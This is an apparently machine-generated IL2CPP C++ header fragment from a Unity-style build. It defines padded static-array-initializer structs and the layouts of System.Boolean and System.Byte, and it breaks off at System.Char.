#ifndef __STATICARRAYINITTYPESIZEU3D212_TDFB9BEA11D871D109F9E6502B2F50F7115451AAF_H #define __STATICARRAYINITTYPESIZEU3D212_TDFB9BEA11D871D109F9E6502B2F50F7115451AAF_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=212 struct __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF__padding[212]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D212_TDFB9BEA11D871D109F9E6502B2F50F7115451AAF_H #ifndef __STATICARRAYINITTYPESIZEU3D21252_TCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462_H #define __STATICARRAYINITTYPESIZEU3D21252_TCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=21252 struct __StaticArrayInitTypeSizeU3D21252_tCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D21252_tCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462__padding[21252]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D21252_TCA2B51BDF30FDECEBFCB55CC7530A0A7D6BC4462_H #ifndef __STATICARRAYINITTYPESIZEU3D2350_T96984AEF232104302694B7EFDA3F92BC42BF207D_H #define __STATICARRAYINITTYPESIZEU3D2350_T96984AEF232104302694B7EFDA3F92BC42BF207D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2350 struct __StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D2350_t96984AEF232104302694B7EFDA3F92BC42BF207D__padding[2350]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D2350_T96984AEF232104302694B7EFDA3F92BC42BF207D_H #ifndef __STATICARRAYINITTYPESIZEU3D2382_TB4AF2C49C5120B6EB285BA4D247340D8E243A1BA_H #define __STATICARRAYINITTYPESIZEU3D2382_TB4AF2C49C5120B6EB285BA4D247340D8E243A1BA_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=2382 struct __StaticArrayInitTypeSizeU3D2382_tB4AF2C49C5120B6EB285BA4D247340D8E243A1BA { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D2382_tB4AF2C49C5120B6EB285BA4D247340D8E243A1BA__padding[2382]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D2382_TB4AF2C49C5120B6EB285BA4D247340D8E243A1BA_H #ifndef __STATICARRAYINITTYPESIZEU3D24_TAB08761D1BC4313A0535E193F4E1A1AFA8B3F123_H #define __STATICARRAYINITTYPESIZEU3D24_TAB08761D1BC4313A0535E193F4E1A1AFA8B3F123_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=24 struct __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D24_tAB08761D1BC4313A0535E193F4E1A1AFA8B3F123__padding[24]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D24_TAB08761D1BC4313A0535E193F4E1A1AFA8B3F123_H #ifndef __STATICARRAYINITTYPESIZEU3D240_T5643A77865294845ACC505FE42EA1067CAC04FD8_H #define __STATICARRAYINITTYPESIZEU3D240_T5643A77865294845ACC505FE42EA1067CAC04FD8_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=240 struct __StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D240_t5643A77865294845ACC505FE42EA1067CAC04FD8__padding[240]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D240_T5643A77865294845ACC505FE42EA1067CAC04FD8_H #ifndef __STATICARRAYINITTYPESIZEU3D256_T9003B1E1E8C82BC25ADE7407C58A314C292B326F_H #define __STATICARRAYINITTYPESIZEU3D256_T9003B1E1E8C82BC25ADE7407C58A314C292B326F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=256 struct __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F__padding[256]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D256_T9003B1E1E8C82BC25ADE7407C58A314C292B326F_H #ifndef __STATICARRAYINITTYPESIZEU3D262_T93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7_H #define __STATICARRAYINITTYPESIZEU3D262_T93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=262 struct __StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D262_t93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7__padding[262]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D262_T93124A1A3E9EDF7F1F305BD2FC57372646F3CFD7_H #ifndef __STATICARRAYINITTYPESIZEU3D288_T7B40D7F3A8D262F90A76460FF94E92CE08AFCF55_H #define __STATICARRAYINITTYPESIZEU3D288_T7B40D7F3A8D262F90A76460FF94E92CE08AFCF55_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=288 struct __StaticArrayInitTypeSizeU3D288_t7B40D7F3A8D262F90A76460FF94E92CE08AFCF55 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D288_t7B40D7F3A8D262F90A76460FF94E92CE08AFCF55__padding[288]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D288_T7B40D7F3A8D262F90A76460FF94E92CE08AFCF55_H #ifndef __STATICARRAYINITTYPESIZEU3D3_T651350E6AC00D0836A5D0539D0D68852BE81E08E_H #define __STATICARRAYINITTYPESIZEU3D3_T651350E6AC00D0836A5D0539D0D68852BE81E08E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3 struct __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E__padding[3]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D3_T651350E6AC00D0836A5D0539D0D68852BE81E08E_H #ifndef __STATICARRAYINITTYPESIZEU3D3132_T7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333_H #define __STATICARRAYINITTYPESIZEU3D3132_T7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=3132 struct __StaticArrayInitTypeSizeU3D3132_t7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D3132_t7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333__padding[3132]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D3132_T7837B5DAEC2B2BEBD61C333545DB9AE2F35BF333_H #ifndef __STATICARRAYINITTYPESIZEU3D32_T06FF35439BDF1A6AAB50820787FA5D7A4FA09472_H #define __STATICARRAYINITTYPESIZEU3D32_T06FF35439BDF1A6AAB50820787FA5D7A4FA09472_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=32 struct __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D32_t06FF35439BDF1A6AAB50820787FA5D7A4FA09472__padding[32]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D32_T06FF35439BDF1A6AAB50820787FA5D7A4FA09472_H #ifndef __STATICARRAYINITTYPESIZEU3D320_T48B9242FB90DB2A21A723BBAB141500A9641EB49_H #define __STATICARRAYINITTYPESIZEU3D320_T48B9242FB90DB2A21A723BBAB141500A9641EB49_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=320 struct __StaticArrayInitTypeSizeU3D320_t48B9242FB90DB2A21A723BBAB141500A9641EB49 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D320_t48B9242FB90DB2A21A723BBAB141500A9641EB49__padding[320]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D320_T48B9242FB90DB2A21A723BBAB141500A9641EB49_H #ifndef __STATICARRAYINITTYPESIZEU3D36_T553C250FA8609975E44273C4AD8F28E487272E17_H #define __STATICARRAYINITTYPESIZEU3D36_T553C250FA8609975E44273C4AD8F28E487272E17_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=36 struct __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D36_t553C250FA8609975E44273C4AD8F28E487272E17__padding[36]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D36_T553C250FA8609975E44273C4AD8F28E487272E17_H #ifndef __STATICARRAYINITTYPESIZEU3D360_TFF8371303424DEBAE608051BAA970E5AFB409DF7_H #define __STATICARRAYINITTYPESIZEU3D360_TFF8371303424DEBAE608051BAA970E5AFB409DF7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=360 struct __StaticArrayInitTypeSizeU3D360_tFF8371303424DEBAE608051BAA970E5AFB409DF7 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D360_tFF8371303424DEBAE608051BAA970E5AFB409DF7__padding[360]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D360_TFF8371303424DEBAE608051BAA970E5AFB409DF7_H #ifndef __STATICARRAYINITTYPESIZEU3D38_TA52D24A5F9970582D6B55437967C9BD32E03F05D_H #define __STATICARRAYINITTYPESIZEU3D38_TA52D24A5F9970582D6B55437967C9BD32E03F05D_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=38 struct __StaticArrayInitTypeSizeU3D38_tA52D24A5F9970582D6B55437967C9BD32E03F05D { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D38_tA52D24A5F9970582D6B55437967C9BD32E03F05D__padding[38]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D38_TA52D24A5F9970582D6B55437967C9BD32E03F05D_H #ifndef __STATICARRAYINITTYPESIZEU3D40_T0453B23B081EF301CB1E3167001650AD0C490F04_H #define __STATICARRAYINITTYPESIZEU3D40_T0453B23B081EF301CB1E3167001650AD0C490F04_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=40 struct __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04__padding[40]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D40_T0453B23B081EF301CB1E3167001650AD0C490F04_H #ifndef __STATICARRAYINITTYPESIZEU3D42_T3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4_H #define __STATICARRAYINITTYPESIZEU3D42_T3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=42 struct __StaticArrayInitTypeSizeU3D42_t3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D42_t3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4__padding[42]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D42_T3D9F6218E615F20CE7E1AE0EF6657DE732EDBFD4_H #ifndef __STATICARRAYINITTYPESIZEU3D44_T1383A9A990CD22E4246B656157D17C8051BFAD7F_H #define __STATICARRAYINITTYPESIZEU3D44_T1383A9A990CD22E4246B656157D17C8051BFAD7F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=44 struct __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D44_t1383A9A990CD22E4246B656157D17C8051BFAD7F__padding[44]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D44_T1383A9A990CD22E4246B656157D17C8051BFAD7F_H #ifndef __STATICARRAYINITTYPESIZEU3D48_TE49166878222E9194FE3FD621830EDB6E705F79A_H #define __STATICARRAYINITTYPESIZEU3D48_TE49166878222E9194FE3FD621830EDB6E705F79A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=48 struct __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D48_tE49166878222E9194FE3FD621830EDB6E705F79A__padding[48]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D48_TE49166878222E9194FE3FD621830EDB6E705F79A_H #ifndef __STATICARRAYINITTYPESIZEU3D52_TF7B918A088A367994FBAEB73123296D8929B543A_H #define __STATICARRAYINITTYPESIZEU3D52_TF7B918A088A367994FBAEB73123296D8929B543A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=52 struct __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A__padding[52]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D52_TF7B918A088A367994FBAEB73123296D8929B543A_H #ifndef __STATICARRAYINITTYPESIZEU3D56_TE92B90DB812A206A3F9FED2827695B30D2F06D10_H #define __STATICARRAYINITTYPESIZEU3D56_TE92B90DB812A206A3F9FED2827695B30D2F06D10_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=56 struct __StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D56_tE92B90DB812A206A3F9FED2827695B30D2F06D10__padding[56]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D56_TE92B90DB812A206A3F9FED2827695B30D2F06D10_H #ifndef __STATICARRAYINITTYPESIZEU3D6_TC937DCE458F6AE4186120B4DDF95463176C75C78_H #define __STATICARRAYINITTYPESIZEU3D6_TC937DCE458F6AE4186120B4DDF95463176C75C78_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=6 struct __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78__padding[6]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D6_TC937DCE458F6AE4186120B4DDF95463176C75C78_H #ifndef __STATICARRAYINITTYPESIZEU3D64_TC44517F575DC9AEC7589A864FEA072030961DAF6_H #define __STATICARRAYINITTYPESIZEU3D64_TC44517F575DC9AEC7589A864FEA072030961DAF6_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=64 struct __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6__padding[64]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D64_TC44517F575DC9AEC7589A864FEA072030961DAF6_H #ifndef __STATICARRAYINITTYPESIZEU3D640_T9C691C15FA1A34F93F102000D5F515E32241C910_H #define __STATICARRAYINITTYPESIZEU3D640_T9C691C15FA1A34F93F102000D5F515E32241C910_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=640 struct __StaticArrayInitTypeSizeU3D640_t9C691C15FA1A34F93F102000D5F515E32241C910 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D640_t9C691C15FA1A34F93F102000D5F515E32241C910__padding[640]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D640_T9C691C15FA1A34F93F102000D5F515E32241C910_H #ifndef __STATICARRAYINITTYPESIZEU3D72_TF9B2DE61B68289FA0233B6E305B08B2FCD612FA1_H #define __STATICARRAYINITTYPESIZEU3D72_TF9B2DE61B68289FA0233B6E305B08B2FCD612FA1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=72 struct __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1__padding[72]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D72_TF9B2DE61B68289FA0233B6E305B08B2FCD612FA1_H #ifndef __STATICARRAYINITTYPESIZEU3D76_T83BE44A74AC13CD15474DA7726C9C92BD317CFFB_H #define __STATICARRAYINITTYPESIZEU3D76_T83BE44A74AC13CD15474DA7726C9C92BD317CFFB_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=76 struct __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D76_t83BE44A74AC13CD15474DA7726C9C92BD317CFFB__padding[76]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D76_T83BE44A74AC13CD15474DA7726C9C92BD317CFFB_H #ifndef __STATICARRAYINITTYPESIZEU3D84_TF52293EFB26AA1D2C169389BB83253C5BAE8076A_H #define __STATICARRAYINITTYPESIZEU3D84_TF52293EFB26AA1D2C169389BB83253C5BAE8076A_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=84 struct __StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D84_tF52293EFB26AA1D2C169389BB83253C5BAE8076A__padding[84]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D84_TF52293EFB26AA1D2C169389BB83253C5BAE8076A_H #ifndef __STATICARRAYINITTYPESIZEU3D9_TF0D137C898E06A3CD9FFB079C91D796B9EC8B928_H #define __STATICARRAYINITTYPESIZEU3D9_TF0D137C898E06A3CD9FFB079C91D796B9EC8B928_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=9 struct __StaticArrayInitTypeSizeU3D9_tF0D137C898E06A3CD9FFB079C91D796B9EC8B928 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D9_tF0D137C898E06A3CD9FFB079C91D796B9EC8B928__padding[9]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D9_TF0D137C898E06A3CD9FFB079C91D796B9EC8B928_H #ifndef __STATICARRAYINITTYPESIZEU3D94_T23554D8B96399688002A3BE81C7C15EFB011DEC6_H #define __STATICARRAYINITTYPESIZEU3D94_T23554D8B96399688002A3BE81C7C15EFB011DEC6_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=94 struct __StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6 { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D94_t23554D8B96399688002A3BE81C7C15EFB011DEC6__padding[94]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D94_T23554D8B96399688002A3BE81C7C15EFB011DEC6_H #ifndef __STATICARRAYINITTYPESIZEU3D998_T8A5C9782706B510180A1B9C9F7E96F8F48421B8C_H #define __STATICARRAYINITTYPESIZEU3D998_T8A5C9782706B510180A1B9C9F7E96F8F48421B8C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // <PrivateImplementationDetails>/__StaticArrayInitTypeSize=998 struct __StaticArrayInitTypeSizeU3D998_t8A5C9782706B510180A1B9C9F7E96F8F48421B8C { public: union { struct { union { }; }; uint8_t __StaticArrayInitTypeSizeU3D998_t8A5C9782706B510180A1B9C9F7E96F8F48421B8C__padding[998]; }; public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // __STATICARRAYINITTYPESIZEU3D998_T8A5C9782706B510180A1B9C9F7E96F8F48421B8C_H #ifndef BOOLEAN_TB53F6830F670160873277339AA58F15CAED4399C_H #define BOOLEAN_TB53F6830F670160873277339AA58F15CAED4399C_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Boolean struct Boolean_tB53F6830F670160873277339AA58F15CAED4399C { public: // System.Boolean System.Boolean::m_value bool ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Boolean_tB53F6830F670160873277339AA58F15CAED4399C, ___m_value_0)); } inline bool get_m_value_0() const { return ___m_value_0; } inline bool* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(bool value) { ___m_value_0 = value; } }; struct Boolean_tB53F6830F670160873277339AA58F15CAED4399C_StaticFields { public: // System.String System.Boolean::TrueString String_t* ___TrueString_5; // System.String System.Boolean::FalseString String_t* ___FalseString_6; public: inline static int32_t get_offset_of_TrueString_5() { return static_cast<int32_t>(offsetof(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_StaticFields, ___TrueString_5)); } inline String_t* get_TrueString_5() const { return ___TrueString_5; } inline String_t** get_address_of_TrueString_5() { return &___TrueString_5; } inline void set_TrueString_5(String_t* value) { ___TrueString_5 = value; Il2CppCodeGenWriteBarrier((&___TrueString_5), value); } inline static int32_t get_offset_of_FalseString_6() { return static_cast<int32_t>(offsetof(Boolean_tB53F6830F670160873277339AA58F15CAED4399C_StaticFields, ___FalseString_6)); } inline String_t* get_FalseString_6() const { return ___FalseString_6; } inline String_t** get_address_of_FalseString_6() { return &___FalseString_6; } inline void set_FalseString_6(String_t* value) { ___FalseString_6 = value; Il2CppCodeGenWriteBarrier((&___FalseString_6), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // BOOLEAN_TB53F6830F670160873277339AA58F15CAED4399C_H #ifndef BYTE_TF87C579059BD4633E6840EBBBEEF899C6E33EF07_H #define BYTE_TF87C579059BD4633E6840EBBBEEF899C6E33EF07_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Byte struct Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07 { public: // System.Byte System.Byte::m_value uint8_t ___m_value_0; public: inline static int32_t get_offset_of_m_value_0() { return static_cast<int32_t>(offsetof(Byte_tF87C579059BD4633E6840EBBBEEF899C6E33EF07, ___m_value_0)); } inline uint8_t get_m_value_0() const { return ___m_value_0; } inline uint8_t* get_address_of_m_value_0() { return &___m_value_0; } inline void set_m_value_0(uint8_t value) { ___m_value_0 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // BYTE_TF87C579059BD4633E6840EBBBEEF899C6E33EF07_H #ifndef CHAR_TBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_H #define CHAR_TBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Char struct Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9 